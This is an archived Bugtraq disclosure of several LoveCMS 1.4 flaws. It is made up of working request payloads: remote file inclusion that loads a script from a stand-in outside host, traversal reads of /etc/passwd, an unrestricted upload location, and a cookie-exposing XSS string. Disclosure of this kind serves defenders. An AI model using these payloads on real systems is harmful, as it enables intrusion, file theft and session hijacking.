[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

LoveCMS 1.4 multiple vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: LoveCMS 1.4 multiple vulnerabilities
From: none@xxxxxxxx
Date: 22 Feb 2007 04:38:13 -0000

rfi:
/lovecms/install/index.php?step=http://site.com/boum.txt?

lfi:
/lovecms/install/index.php?step=/etc/passwd%00
/lovecms/?load=../../../../../../../../../../etc/passwd%00

admin upload vuln :
upload any kind of file even if it's not accepted it will be stored here :
/modules/content/pictures/tmp/

xss get via error sql:
/lovecms/?load=content&id='</textarea>'"><script>alert(document.cookie)</script>

laurent gaffié

Prev by Date: Plantilla PHP Simple
Next by Date: pheap [edit LFI] vulnerability
Previous by thread: Plantilla PHP Simple
Next by thread: pheap [edit LFI] vulnerability
Index(es):
- Date
- Thread